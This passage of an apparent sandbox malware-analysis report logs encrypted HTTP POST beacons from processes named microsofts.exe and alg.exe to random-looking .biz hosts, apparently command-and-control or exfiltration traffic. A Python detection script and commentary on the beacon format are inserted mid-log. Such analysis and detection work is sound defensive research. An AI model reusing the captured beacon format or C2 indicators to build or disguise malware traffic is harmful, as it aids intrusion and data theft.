Oct 10, 2024 10:09:05.146370888 CEST | 828 | OUT | Data Raw: 57 ca f7 0e 61 53 a8 5b 30 03 00 00 f0 c3 9b 34 54 70 20 6e 67 00 77 60 e2 1c 53 ee bb 37 43 e7 c2 9b 3a 45 c7 9e 5e 5a ce 80 1a d3 51 9b 78 52 e1 e3 9d 2a aa f0 ca d1 dd 73 51 f9 0c 84 ae f5 19 e5 3d 87 0e 7f e3 39 4e 7b 87 5b 20 24 9d 8b ee ec
Data Ascii: WaS[04Tp ngw`S7C:E^ZQxR*sQ=9N{[ $qFi>]FeR$}.uQe~+&c:^Z~s,O_3f^y?'Jd,&;H Jb}'prLmJ4_ofCk}ZWGWgt'
Oct 10, 2024 10:09:05.628190994 CEST | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:09:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b16c653960126ccafa487e142af505ac|8.46.123.33|1728547745|1728547745|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.5 | 51586 | 13.251.16.150 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:05.960378885 CEST | 354 | OUT | POST /yavxloupuaxr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: iuzpxe.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:09:05.960378885 CEST | 828 | OUT | Data Raw: d8 b5 d1 17 68 3b e2 3c 30 03 00 00 9b 5e b4 58 54 c1 41 10 2a 47 b4 72 88 19 7c f6 ae 0a 04 10 7f 4b ce 03 8c 49 25 03 2b ec 1a 06 64 e6 f2 ea 90 08 96 82 c7 7f 1b 47 1f ab 06 0f d8 24 7b b4 79 dd 8c 0c e0 0d 97 e2 b7 1b 02 f0 2e 20 93 d3 0b 00
Data Ascii: h;<0^XTA*Gr|KI%+dG${y. JUHwND'DJde*+%&%H>s/KtaS6:tEl_~_!rNvyeZB?#6Qs%xu`x(#<dQ>fV@/
Oct 10, 2024 10:09:07.357758045 CEST | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:09:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6d1a7a24d76700a8e2554a4fa0dfee19|8.46.123.33|1728547747|1728547747|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.5 | 51587 | 3.254.94.185 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:06.287887096 CEST | 351 | OUT | POST /vsxacwvtko HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uaafd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:09:06.287902117 CEST | 778 | OUT | Data Raw: 86 5e d2 f1 d1 6a 22 dd fe 02 00 00 24 a1 ec e4 cb 98 37 cf ec bc 12 00 ac 53 71 b1 34 7e cc e2 12 38 45 ed b0 b7 c3 1e e1 71 1b 6e d0 d8 eb 55 20 e8 9b b4 f1 84 b8 c2 f5 25 66 1f da 4a d3 88 93 7f 29 58 4f 1f ff 65 01 85 28 6b bc c2 7c 3e b0 e2
Data Ascii: ^j"$7Sq4~8EqnU %fJ)XOe(k|>63"H2VR_}@=}4rb3uQvK9U{XbL-VOpE)WsfE6i(o,n$(A$E8R )o&B573%;&
Oct 10, 2024 10:09:07.253262997 CEST | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:09:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=000f97c7efeaf81b6233129c236085e5|8.46.123.33|1728547746|1728547746|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


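The POST bodies captured in this section share a structure the report does not call out: bytes 8 through 11 hold a little-endian uint32 equal to Content-Length minus 12 (0x2fe = 766 for the 778-byte bodies sent by alg.exe, 0x330 = 816 for the 828-byte bodies sent by microsofts.exe), and each contacted domain, although the four resolve to three different addresses, answers with the same shape of response: nginx, 200, an empty chunked body, and a btst cookie that embeds the analysis host's egress IP 8.46.123.33 together with an epoch that matches the response's Date header to the second. The Python below is an added example, not part of the Joe Sandbox report or of the malware: it reproduces the captured body prefixes (copied from the truncated Data Raw dumps above, so only the first 16 bytes of each body), checks the length field, scores a request against the four observable traits, and decodes the btst cookie. The 12-byte header interpretation, the host and path regexes, and the three-of-four threshold are assumptions fitted to these sessions only, not a published description of the protocol; the domains being served by a single operator is an inference from the identical responses, not something the report states.

```python
import re
import struct
from datetime import datetime, timezone

# Leading bytes of each POST body, copied from the truncated "Data Raw" dumps in
# this section; the report cuts every dump short, so only 16 bytes per body are kept.
CAPTURED = [
    # host, path, Content-Length, first 16 body bytes
    ("yauexmxk.biz",  "/jebhuwdu",     828, "57 ca f7 0e 61 53 a8 5b 30 03 00 00 f0 c3 9b 34"),
    ("iuzpxe.biz",    "/yavxloupuaxr", 828, "d8 b5 d1 17 68 3b e2 3c 30 03 00 00 9b 5e b4 58"),
    ("uaafd.biz",     "/vsxacwvtko",   778, "86 5e d2 f1 d1 6a 22 dd fe 02 00 00 24 a1 ec e4"),
    ("sxmiywsfv.biz", "/kcrxavatov",   828, "c4 87 0f f0 0f e2 85 36 30 03 00 00 86 d1 58 18"),
]

BEACON_UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
             "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
             "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")

# Assumption: 8 bytes of varying prefix, then a uint32 payload length, then the payload.
HEADER_LEN = 12


def payload_length(body_prefix: bytes) -> int:
    """Little-endian uint32 read from offset 8 of the POST body."""
    return struct.unpack_from("<I", body_prefix, 8)[0]


def length_field_matches(body_prefix: bytes, content_length: int) -> bool:
    """True when the embedded length equals Content-Length minus the 12-byte header."""
    return len(body_prefix) >= HEADER_LEN and payload_length(body_prefix) == content_length - HEADER_LEN


# Assumed shape of the generated names, fitted to the hosts and paths seen in this section.
HOST_RE = re.compile(r"^[a-z]{5,10}\.biz$")
PATH_RE = re.compile(r"^/[a-z]{8,14}$")


def beacon_indicators(method: str, host: str, path: str, user_agent: str,
                      content_length: int, body_prefix: bytes) -> list[str]:
    """Names of the observable traits a request shares with the captured beacons."""
    hits = []
    if method == "POST" and HOST_RE.match(host):
        hits.append("post-to-random-biz-host")
    if PATH_RE.match(path):
        hits.append("random-lowercase-path")
    if user_agent == BEACON_UA:
        hits.append("wechat-qqbrowser-ua")
    if length_field_matches(body_prefix, content_length):
        hits.append("length-field-at-offset-8")
    return hits


def is_beacon(method, host, path, user_agent, content_length, body_prefix) -> bool:
    """Assumed threshold: three of the four traits together."""
    return len(beacon_indicators(method, host, path, user_agent, content_length, body_prefix)) >= 3


# btst=<32 hex>|<client IP>|<first seen>|<last seen>|...  as returned by every contacted host.
COOKIE_RE = re.compile(r"btst=([0-9a-f]{32})\|(\d{1,3}(?:\.\d{1,3}){3})\|(\d+)\|(\d+)\|")


def parse_btst_cookie(set_cookie: str):
    """Return (token, client IP, first seen, last seen) with the epochs as UTC datetimes, or None."""
    m = COOKIE_RE.search(set_cookie)
    if m is None:
        return None
    token, ip, first, last = m.groups()

    def as_utc(epoch: str) -> datetime:
        return datetime.fromtimestamp(int(epoch), tz=timezone.utc)

    return token, ip, as_utc(first), as_utc(last)


if __name__ == "__main__":
    for host, path, clen, hexdump in CAPTURED:
        prefix = bytes.fromhex(hexdump)
        print(f"{host:14} length field={payload_length(prefix)} "
              f"Content-Length-12={clen - HEADER_LEN} "
              f"hits={beacon_indicators('POST', host, path, BEACON_UA, clen, prefix)}")
    print(parse_btst_cookie("btst=b16c653960126ccafa487e142af505ac|8.46.123.33|"
                            "1728547745|1728547745|0|1|0; path=/; domain=.yauexmxk.biz"))
```

Because the report truncates the dumps, nothing here can decrypt or interpret the payload; the length-field check is only a structural confirmation that the five bodies belong to one format, which is useful when writing a proxy or IDS rule that should not fire on the User-Agent string alone (a real WeChat client sends that string too).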
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.5 | 51588 | 13.251.16.150 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:07.396626949 CEST | 355 | OUT | POST /kcrxavatov HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: sxmiywsfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:09:07.396652937 CEST | 828 | OUT | Data Raw: c4 87 0f f0 0f e2 85 36 30 03 00 00 86 d1 58 18 5e ed 16 ab 86 a3 40 f4 34 77 29 19 2f 6a 2e 6d f6 95 76 3d 12 cb 2b 61 23 15 07 2a 67 8b 70 79 86 d5 b5 43 86 e2 0d 7e 67 71 dc 13 1a 13 43 17 5c 13 66 85 a8 3a 98 e5 e1 72 86 09 21 2c d3 87 4b e1
Data Ascii: 60X^@4w)/j.mv=+a#*gpyC~gqC\f:r!,K*H3yjDLILLQJLcOM3>Mc`c0_U1d2IBw-4niXWd}9zJ^M{k`THFG"}<o8<=
Oct 10, 2024 10:09:08.745182037 CEST | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:09:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d5eabd6830bad68b6146644d2c09ce11|8.46.123.33|1728547748|1728547748|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.2.5 | 51589 | 18.141.10.107 | 80 | 7120 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:07.485049963 CEST | 354 | OUT | POST /iaiodpshpb HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: eufxebus.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Oct 10, 2024 10:09:07.485080004 CEST | 778 | OUT | Data Raw: ad b0 be c2 e3 e6 da 7a fe 02 00 00 26 5f 31 16 c8 c1 f7 7b e7 82 4c b2 eb 7d c7 e1 3c 40 41 0e 4d 19 84 40 62 6a 92 41 7e ff cf 77 dc c1 06 44 ec 29 23 0d 57 dd 0e 8b ad 0b f7 a9 bd a6 68 21 d6 42 e6 fe 7b d2 b8 ec 66 49 cd ce 81 bb b0 bc e8 ab
    Data Ascii: z&_1{L}<@AM@bjA~wD)#Wh!B{fI\nN0nHG2 o[\,z|4fJ~Vm,n<JNC-xsy/;e _%}1?/8I?ULlQ1S^BoAqQ`
Oct 10, 2024 10:09:08.846165895 CEST | 410 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 10 Oct 2024 08:09:08 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=675ec4d3d8455851936f8630de23865d|8.46.123.33|1728547748|1728547748|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.5 | 51591 | 34.211.97.45 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:08.766442060 CEST | 347 | OUT | POST /ect HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: vrrazpdh.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Oct 10, 2024 10:09:08.766467094 CEST | 828 | OUT | Data Raw: a2 23 05 5e c5 f0 3c 21 30 03 00 00 c4 e5 4a c4 16 12 27 c1 d3 9c 66 14 93 7d eb c3 47 5f a2 48 8d e2 fc cb 3f 02 b3 8e 40 c8 8f 2b 4a 21 75 07 37 0c c0 23 3d 1a 98 fc de 56 8c 9e 0a 4c d8 72 73 36 c9 25 4b 39 e9 b1 41 15 c2 9d a8 b5 4f f3 99 73
    Data Ascii: #^<!0J'f}G_H?@+J!u7#=VLrs6%K9AOsAeeJB?msh6'M6czZ~hw*v"[)[/5e:=?D1QS+kn~GZq-N~AFZf:Lc(pMpa+[
Oct 10, 2024 10:09:09.488140106 CEST | 410 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 10 Oct 2024 08:09:09 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=835e317df3118e1943a3dbda7a9833d2|8.46.123.33|1728547749|1728547749|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.5 | 51592 | 34.246.200.160 | 80 | 7120 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:09.049756050 CEST | 351 | OUT | POST /exqaqlffu HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: pwlqfu.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Oct 10, 2024 10:09:09.049839020 CEST | 778 | OUT | Data Raw: 31 92 d4 4f c8 8b ec 3c fe 02 00 00 db 2b a2 dc 30 b3 43 1b 82 07 ad 42 49 ae 46 ec 40 09 63 c8 b6 1f c6 3e f7 c1 b8 ae 17 55 c2 2b a8 94 a2 9f 9f d9 49 85 98 18 32 27 9a a3 68 88 05 b4 f8 b4 fc 3c ae 07 15 35 ba a4 e2 1c d7 03 6b 79 60 c3 0c 31
    Data Ascii: 1O<+0CBIF@c>U+I2'h<5ky`1(}<s5DC1J.]7fK'n"D502l6U!6?@BfbfFD>z@t_C<.pCr~\I.yt#P+h


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.5 | 51593 | 34.246.200.160 | 80 | 7120 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:09.095969915 CEST | 350 | OUT | POST /ucjyqfgo HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: pwlqfu.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Oct 10, 2024 10:09:09.096421003 CEST | 778 | OUT | Data Raw: c7 ed cc 30 2f 21 31 3d fe 02 00 00 5b f7 35 26 93 7e 2b c0 e6 a7 63 1b a4 b5 13 f0 3e 48 3c b0 53 49 c5 bd d2 ad 9a 07 c1 2d 44 c2 4d 23 09 59 bd 44 03 33 e3 12 88 3e 8c ec a8 59 e0 74 fb 14 b5 62 b6 21 71 33 41 07 6e 9a 83 d3 0e 7b 10 56 0d 52
    Data Ascii: 0/!1=[5&~+c>H<SI-DM#YD3>Ytb!q3An{VRx<5)18#mPc7)P*U<LW4fZ>-FKYLg16EzH*pVf}.zwJB.OLH!_hK`}5?


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
104 | 192.168.2.5 | 51594 | 47.129.31.212 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:09.512473106 CEST | 344 | OUT | POST /pb HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ftxlah.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Oct 10, 2024 10:09:09.512487888 CEST | 828 | OUT | Data Raw: d1 91 02 cc 88 b8 ef 2b 30 03 00 00 9c 58 05 da e6 fb cd e1 f6 8f 39 e8 03 95 3d 5e d8 c2 89 18 c4 da 55 0f 62 3f 0d e5 de 1a 9b c1 b8 dc 41 b5 5d 57 fd 99 d0 e9 b4 31 3a 1d 8c 6b b0 9b df b8 19 90 5e bb 83 c7 86 0a b3 7a f1 0f 7c 82 77 04 1b a1
    Data Ascii: +0X9=^Ub?A]W1:k^z|w'/lnYd%gU.nEu`xr:8}o+'[M_,Q%e=Y5AewwU${rtvkbJdid8{QNY
Oct 10, 2024 10:09:10.864902020 CEST | 408 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 10 Oct 2024 08:09:10 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=3fca8c2a2f784fb91c4ea4ddb514f0a0|8.46.123.33|1728547750|1728547750|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.5 | 51595 | 47.129.31.212 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:10.035675049 CEST | 347 | OUT | POST /ha HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: rrqafepng.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Oct 10, 2024 10:09:10.035703897 CEST | 778 | OUT | Data Raw: 86 5b b1 60 ac 73 09 b5 fe 02 00 00 2a 64 f3 e6 59 90 2e bf ce 33 7f d4 05 0f cb df 62 7e 16 e7 1d b8 54 bc 8d c4 65 b2 dd e5 51 db 30 3d 5e 6b 4b cc 39 df 54 0c 61 51 e5 4c 67 72 25 2c c2 57 cc b4 f6 e8 43 73 c4 6b 0c fe 44 f2 e8 bd 0f 5e ff 1b
    Data Ascii: [`s*dY.3b~TeQ0=^kK9TaQLgr%,WCskD^{b0>XaI^vY@jRP9>L:v/=u4UEj/'nmxydzI(?FkTl,hy*gRl*A'~H&'L,=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
106 | 192.168.2.5 | 51596 | 47.129.31.212 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:10.073084116 CEST | 357 | OUT | POST /nqyrhhrsxbrr HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: rrqafepng.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Oct 10, 2024 10:09:10.073107004 CEST | 778 | OUT | Data Raw: eb eb ef 4a b4 f4 ef 3b fe 02 00 00 8b 5c 5c 4c c9 6b fa 6e 90 c3 60 1a 71 7d 21 84 d5 e6 b8 93 f2 0a 6a 17 d7 41 27 94 55 ec ba 08 22 2b de 75 35 8f cb 05 a4 72 22 cd 45 94 37 34 12 5f 4a c2 3a b7 6e 32 ba f8 75 bf 70 92 ac 2a 9b 4e e0 35 ef 20
    Data Ascii: J;\\Lkn`q}!jA'U"+u5r"E74_J:n2up*N5 Z,/4Aw(D0$S27T.D1BSP0:{w65~7&(7SVBX3lv%gi'#z^=KKO>nB;rtAUPC7:Z-sl/v.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
107 | 192.168.2.5 | 51597 | 3.94.10.34 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:10.519200087 CEST | 350 | OUT | POST /sonhfc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ctdtgwag.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Oct 10, 2024 10:09:10.519222975 CEST | 778 | OUT | Data Raw: 46 61 17 d2 3f 8b 9c 78 fe 02 00 00 e1 4b c7 17 f6 87 64 67 ba 01 20 bb 44 28 e8 27 0a ba e4 8e 72 55 61 3d d1 c7 79 89 88 39 4a af 46 1b c8 ed 43 d8 87 ca 7b 67 51 aa 37 f8 80 2c 85 b1 ff 65 86 aa 8e 1a f4 47 31 d2 fa 2b ed 72 46 12 d6 5a ee 71
    Data Ascii: Fa?xKdg D('rUa=y9JFC{gQ7,eG1+rFZq3EWea`k||V*KZX{Lm)7l/GT7q@\Hw9[:<J'4CY)Dgmo29o(}XXD_j&Zr]($7KN
Oct 10, 2024 10:09:10.983189106 CEST | 410 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 10 Oct 2024 08:09:10 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=a7243c0f454fd1c682d6c3a9a648a908|8.46.123.33|1728547750|1728547750|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
108 | 192.168.2.5 | 51598 | 13.251.16.150 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:10.887181997 CEST | 349 | OUT | POST /hkdwng HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: typgfhb.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Oct 10, 2024 10:09:10.887181997 CEST | 828 | OUT | Data Raw: b9 3a 78 6a c2 a0 ff ec 30 03 00 00 df d3 40 f9 cf 99 45 6c 5d e2 3e 6f 6a a4 04 aa 9b 29 14 d4 f5 e4 0c 47 98 c4 c7 d6 59 d2 5f b9 c1 6b b0 fb 6a ec 3c 27 e6 39 0b d9 43 db 82 da 13 1c 73 92 c3 a7 ed f3 bd f3 be c4 8b f0 0b 80 48 e6 2f ce 74 52
    Data Ascii: :xj0@El]>oj)GY_kj<'9CsH/tR/^]u.1dpsHub9/M=\/E:7>GX8|^rQ;]tg5\'?T?`#5O]1,#zs?:s>
Oct 10, 2024 10:09:12.256587982 CEST | 409 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 10 Oct 2024 08:09:11 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=4eabcd1a577b91365ebbd19fe671d671|8.46.123.33|1728547751|1728547751|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
109 | 192.168.2.5 | 51599 | 35.164.78.200 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:11.118144035 CEST | 352 | OUT | POST /yavfpoeu HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: tnevuluw.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Oct 10, 2024 10:09:11.118206024 CEST | 778 | OUT | Data Raw: 25 72 ea 19 b8 83 99 a1 fe 02 00 00 58 70 a2 5a 02 0c f9 c7 ab 8b 37 3d f6 b9 ef 08 53 9c 99 70 82 53 e0 50 14 72 b1 8b 89 9b 36 d5 94 a1 c6 ff ac 8d 9c 4e 58 20 43 31 ba 3f dc a4 f7 44 32 6b 8e 08 6e ae d7 29 d1 c6 1f 0c 80 30 84 07 86 8a 23 cd
    Data Ascii: %rXpZ7=SpSPr6NX C1?D2kn)0#lymj%Sg6~GkpmHx1@Za+Ie\V7$BW[,]Ffh,;!3TK=SdDj$=oTK5[N\Rch


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
110        | 192.168.2.5 | 51600       | 35.164.78.200  | 80               | 7120 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:11.157978058 CEST | 360 | OUT | POST /vjmakoegwejtsrok HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: tnevuluw.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
